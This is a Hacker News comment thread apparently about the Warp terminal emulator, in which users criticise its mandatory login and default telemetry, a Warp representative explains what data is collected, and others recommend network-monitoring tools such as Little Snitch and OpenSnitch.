Exactly. I prefer Emacs–style programs where the number of features grows without end, and everyone customizes the UI and keybindings to make the features they like best easiest to use. Every time someone thinks of a new way that Emacs can make their life easier they can add it to Emacs immediately, without asking for permission or even sending in a pull request. Later, if they think the feature is polished enough and others might find it useful, they can send a pull request either to Emacs or to the Emacs Lisp Package Archive (ELPA), or to MELPA (should they not like the minor licensing restrictions on ELPA), or just post it on EmacsWiki or their blog or Facebook page or whatever for others to copy from.

But for that to work you have to start with something that is both very extensible, and yet is also coherently designed. The extensibility has to be a strong part of that initial design, so that the software is designed to be malleable.


I cant use it either (mostly because it's Mac only and also because of the sign-in requirement), but at least they are transparent about it :

https://docs.warp.dev/getting-started/getting-started-with-w...

https://docs.warp.dev/getting-started/privacy


That privacy policy is sketchy. It starts with this-

> Our general philosophy is complete transparency and control of any data leaving your machine. This means that in general any data sharing is opt-in and under the control of the user, and you should be able to remove or export that data from our servers at any time.

They then go on, further down the page, to say that this first paragraph is a complete lie-

> However, for our beta phase, we do send telemetry by default and we do associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong.


is that even legal? or can you just write whatever you want into a privacy policy?


It’s a policy - a set of rules. It’s only a problem if you say something and don’t do it. But even then, enforcement is most likely to come from interested parties like payment providers, who couldn’t generally care less as long as it’s not their data that’s compromised.


That is the modern experience part.


I knew this was too good to be true :(

I feel bad for the engineers who worked on this, as this is really awesome but probably will not find market fit


Wait, you _have_ to have a github account to even open this terminal?

Yikes.


I remember an iOS email client many years ago that required a Dropbox login for some reason. It made no sense that an email client would require me to log in to a cloud file storage/syncing service - in my mind these two things are completely unrelated. That email client ended up disappearing.

I expect that a terminal program which requires a login to a completely unrelated service will end up meeting the same fate as that email client did.


> an iOS email client many years ago that required a Dropbox login for some reason.

IIRC, that was Mailbox. Dropbox bought them a month after launch and then, sadly, killed it off two years later.[^1]

[1]: https://www.theverge.com/2015/12/8/9873268/why-dropbox-mailb...


Yes, I believe that's the one. Thanks!

I couldn't remember it, but with a generic name like Mailbox that's not a surprise.


> I really wanted to like it, too. The screenshots look great

Agreed! Let's just wait for a FOSS alternative to pop up that has a few similar fundamental features. Don't need the cloud-multi-user-account-based stuff.


To be honest, for terminal not being open-source is enough for me. I'm not Stallman, but, terminal, seriously…


1) installed it 2) login required 3) uninstalled it

try again


Just curious, what tools do you prefer to use to identify network requests from recently installed applications such as this?


I can't imagine using a Mac without Little Snitch: https://obdev.at/products/littlesnitch

Among other things, it is disturbing how chatty a lot of things are. (Did you know Apple Mail keeps track of which account you email different people with and wants to send that to configuration.apple.com, even if you have carefully disabled everything Icloud related?)

There's a similar tool for Linux, but I usually keep a networkless VM around for playing with potentially sketchy things.


Closed source, monitors everything on the machine.

How much do you trust little snitch?

And then asking to keep a copy of your drivers license for ten years is a complete non starter. (Yes, that's in their privacy policy)


There is a section about being required by the EU to determine location for VAT collection purposes. If their payment processor can’t determine your location sufficiently, then they have to collect data identifying your location and store it for tax/proof purposes. That’s something they don’t want to ever have to do, obviously.

Here’s a link to the policy: https://www.obdev.at/privacy/index.html


On Linux there is OpenSnitch. A bit rough around the edges, but does what it needs to do well.


Thank you.


On the mac there's Little Snitch.


Any Windows equivalent?



I also would like to know this.


Also, sorry if this is harsh but speaking my mind: why is important to mention what the underlying programming language is?

It seems like misdirection and sleezy marketing. Products built with Rust are particularly susceptible to it.


This. I was excited to try it but I cannot use this on my work computer at all.


It’s a closed source paid spyware development tool that you rely on every day to get work done, what’s not to love about this idea?


Yep, I can pay money for a piece of software so important for my workflow, but no telemetry, no login and other stupid stuff even in opt-in/opt-out fashion.


I just downloaded it, but then thankfully read this comment before running it. No way do I want my terminal sending stuff to Google.


Exactly the same, clicked "comments" as I was downloading it, saw the first comment, deleted the installer.

I'd be supportive of "report issue" buttons (I'd use them, yes), and occasional "Hey, you've used this app for a week/two/month, may we send some telemetry? We need it to better understand how the app is used. Here's the data, is it OK to upload it?" prompts. Yes, as long as I don't see anything sensitive in the payload - it sure is okay, you respect me and I respect you (with bonus points for politely asking); and I'll be sure to reaching out if I'd see anything sensitive.

Phoning home from the get-go for anything but an anonymous update check and requiring some account is a hard "no".


I definitely understand the concerns. For our public beta, we do send telemetry and associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong. But we only track metadata, never console output. For an exhaustive list of events that we track, see here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel.... Once we hit general availability, our plan is to make telemetry completely opt-in and anonymous.


Wow, this is just unbelievable. You don't say anywhere on your privacy page that you are associating this data with specific users.

Everything your company says regarding privacy seems to be a complete lie. You contradict yourselves everywhere. As a security officer I would never allow any company whose security I run to use your product- even if you fix this issues now who knows if you're going to lie again in the future.

Trust is hard to regain once lost, and your company definitely blew it here.


Maybe don't put this lie in the middle of the homepage?

> Private & Secure

> All cloud features are opt-in. Data is encrypted at rest.


Encryption at rest is fun until the keys are leaked.


Or prefix it with a "Final product will be ..."


This looks very interesting to me, but some of this telemetry is a deal breaker. On your privacy page, it says "Our general philosophy is complete transparency and control of any data leaving your machine." If I have complete control of any data leaving my machine, can I opt to turn off the telemetry entirely?


of course not. how else will they be able to make you the product without their trojan rabbit sending back all kinds of telemetry goodness.


> we only track metadata, never console output

It would be meaningful to indicate whether you track console input as well.


That's an important callout! By console output, we really mean output from the pseudoterminal, which includes command input and output printed to the terminal.

We don't store any content of _any_ part of a command that's executed in Warp.


... and never will?


Why even ask?

Founders don't really have much control over what the tools they create wind up being used for.

Assume that some people will use any tool you encounter for the worst thing it can possibly do.

If the tool has significant potential to do things that bother you, don't use it.


Why do you say "wind up being used for" as if it is act of god rather than a business decision?


Because I'm talking about founders and how much control they have over the tools they bring into being.

Acts of God are a better model for that than business decisions.

Some users will abuse the snot out of it, and a small start up may not even realize that's happening for months.

The founder may not retain the authority to control decisions about what changes to make to the tools or how to monetize them.

Hackers may break into the servers and use the tool for their own ends.

And, yes, often enough the founder themselves will throw the users under the bus when push comes to shove.


From their link, it seems they don’t. Agree that positive confirmation would be good, for beta.

> We do not store any data from the command input or output itself as part of our telemetry.


This is correct. We do not send or store any terminal contents (input or outputs) to our server.

The only case in which that is not true is if a user elects to use Warp to share the output of a command using our Block Sharing feature.


With the rest of your responses I'm left looking for weasel words in here.


You should do that now and just ask on startup.

Honestly opting in by default is, at least in my opinion, not acceptable.

People who would say no to that popup would not appreciate you randomly reaching out to them anyway.


That's a ton of data being collected. I would rather much have this submitted during a crash, rather than opt-in/opt-out. I'd not want to use a terminal that has data collection that crosses the internet every time I use it.


Totally understand if you don't feel comfortable using it!

The reason we don't submit this only during a crash, is because there are a lot of other things we want to know about users like: Which features are they using? Are they sticking to warp as their daily driver? How much time do they spend in the app?

We do want to make the telemetry opt-in after Warp is out of beta.


There are better ways to gather feedback, even if your application is in beta. Most loyal customers will let you know what’s wrong and what features they’re most excited about- that honest feedback is far superior than telemetry data. You can even add a survey form after the application exits to try and maximize the feedback loop.

Totally understand you’re a new venture backed business, however, you most likely are targeting the wrong group of users by automatically sending data over the internet for “no reason”.


> Most loyal customers will let you know what’s wrong and what features they’re most excited about- that honest feedback is far superior than telemetry data

That's just wrong. Very few users, regardless of loyalty, would bother sending feedback. That's why many companies have drives with gift cards or whatever as reward for participating in giving feedback. And even then, you'd get a limited subset of users ( loyal, loud, with time available to waste) instead of everyone like with telemetry.


How are you checking if they stick to warp as daily driver? Are you checking for other shells open?


We are seeing if people are using Warp regularly.

We don’t know about any shells outside of Warp so technically, they could also using other terminals - but that’s enough info for our product development.

We never track the contents of commands. A full telemetry table is included in our user docs.


I definitely will not try it if the analytics part are not optional, though I am glad to see you're documenting exactly what gets sent. I might consider trying it and even opt-in to the analytics once you make it optional.


At least for EU users, you cannot collect information like this without the explicit consent of those users.

It's 2022 FFS, and still companies are over-stepping the mark - companies behaving like yours are exactly the reason GDPR and ePrivacy etc exist in the first place :/


well, they gotta pay back those $17M to investors !


Yup, that's an immediate deal-breaker for me. Shame because this looks really interesting :/


Yes, but it's written in Rust.


> I really wanted to like it, too. The screenshots look great

My thoughts exactly. I don't use potential keyloggers on my browser (think grammarly or similar), I'm not going to install a terminal making requests or getting my data as I use it.


They have a "layman's terms" section where it states that for now, in beta, telemetry is going to be on regardless https://www.warp.dev/privacy

They promise that after beta you won't need Github, and telemetry will be optional.

Though imo this is just as easy to read and understand: https://assets-global.website-files.com/60352b1db5736ada4741...


How do you check which requests its making? Do you just use tcpdump or something?


You could use a layer 7 firewall for this purpose. I use Little Snitch on macOS and Opensnitch on Linux. Given this application is macOS only right now, I would bet OP used LS since its popular on macOS.


Thank you. Im dual booting osx and linux right now so those will both come in handy.


Just FYI, sentry is error capturing and reporting tool, not "telemetry". It could be potentially abused to collect "telemetry", but there are far better tools for that so it'd make little sense IMHO. I've used it extensively for error management in a previous job and it worked very well, correlating with env, release, etc. and it was great ( it was the self-hosted version, but still). Not affiliated in any way, just a happy "customer" ( never paid so not really a customer).


As a user of sentry technically, you're also aware of how difficult it is to keep user information out of those errors and stacktraces. Just paths are enough to start leaking information about you and your system that just shouldn't leak from your terminal to the internet.


yeah, hard pass

edit: no windows or linux support ???


There's no reason for a terminal emulator to connect to the internet or collect telemetry opt-in or not. None whatsoever.


UI looks great to me too. Thanks for the comment, I'll skip on downloading this though because of the outgoing requests


Not touching it with a 10-foot pole.


What is your tool of choice for intercepting outgoing requests like this?


That’s concerning - I am also wondering if iTerm too sends this data…


yeah I just block all of those domains in my dns reverse proxy now, idgaf


Thank you!


lol


Come on. You must realize VS Code and basically every website you use collects telemetry data, which is rarely for anything nefarious except product improvements. If GitHub/Microsoft had released this product, would you be raising the same concerns?


We can set the bar higher than “other people do this too so it’s fine”.

> If GitHub/Microsoft had released this product, would you be raising the same concerns?

Yes. It’s one of the reasons I use the open source build instead.


Me too. VSCodium FTW https://vscodium.com/


Maybe not but I'd trust Microsoft has a decent security and privacy team working on this more than a startup. What if they're logging the wrong stuff and my data is leaked?


Good point - Microsoft products practically created the modern security industry. They're experts.


Did you mean that old school Microsoft was so badly insecure that they created a massive opportunity for security professionals.


I did mean that, yes.


You mean like when Microsoft started uploading all handwriting & voice recognition inputs including passwords?

History has shown that telemetry is effectively spyware until proven otherwise, no matter who does it.


Yeah but if Microsoft fuck up badly enough I can sue them, startups are less likely to survive a significant breach (especially if the thing being breached is 100% of their product). There's just far less risk.


I think you could've had a full stop before 'until proven otherwise'.


I use VS Codium for this reason and self host git so yeah for me that's definitely a thing. And I have a ton of stuff to block as much telemetry from other software and websites as I can, including on mobile.

It's not for everyone but yes there are still Don Quixotes like me fighting the army of windmills :)

I suspect the proportion of us here at HN is pretty high too.


A remote system by definition has access to the information you give them and you should manage that carefully. Meanwhile your filesystem has access to your entire life, heart, and mind unvarnished, edited, and unsegregated with ephemera alongside the deep facts of your mind.

Microsoft is a criminal enterprise that relatively recently got god to a degree and actually started caring about their image at home while still facilitating crime and corruption abroad. The fact that many are stupid enough to trust them with their data does not imply that this is a reasonable choice.


> which is rarely for anything nefarious except product improvements

Up until now, you've had to make these design decisions on your own, relying only on perplexing intangibilities like 'taste' and 'intuition'.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: